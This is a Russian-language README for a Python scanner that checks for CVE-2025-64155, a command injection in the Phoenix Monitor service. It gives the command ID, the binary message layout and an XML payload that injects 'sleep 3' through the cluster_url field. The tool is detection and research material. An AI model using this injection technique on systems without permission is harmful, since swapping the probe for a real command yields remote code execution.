
CVE-2025-64155-hunter
Сканер на Python для обнаружения уязвимости внедрения команд (CVE-2025-64155) в сервисе Phoenix Monitor.
CVE-2025-64155 — это уязвимость внедрения команд в сервисе Phoenix Monitor, позволяющая удалённое выполнение кода через параметр cluster_url в команде handleStorageRequest (идентификатор команды: 1075724911).
Уязвимость возникает, когда вводимые пользователем данные в поле cluster_url передаются в команду оболочки без надлежащей санитизации, что позволяет внедрять команды с помощью метасимволов оболочки.
Этот сканер основан на исследовании эксплойта от Horizon3AI.
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: IP-адрес или имя хоста цели (обязательно)-p, --port: Порт сервиса Phoenix Monitor (по умолчанию: 7900)--timeout: Тайм-аут соединения в секундах (по умолчанию: 10)-v, --verbose: Включить подробный вывод--check-only: Только проверить доступность сервисаСканер использует метод обнаружения по времени:
handleStorageRequest с вредоносной нагрузкой, содержащей sleep 3 в поле cluster_urlЭтот метод безопасен и не причиняет вреда — он не выполняет вредоносных команд, только безвредную команду sleep для целей обнаружения.
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
Сканер отправляет двоичное сообщение со следующей структурой:
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload
XML-нагрузка содержит внедрение команды в поле cluster_url:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Используйте его только на системах, которые вам принадлежат или на которые у вас есть явное разрешение на тестирование. Несанкционированный доступ к компьютерным системам является незаконным.
Лицензия MIT — подробности в файле LICENSE.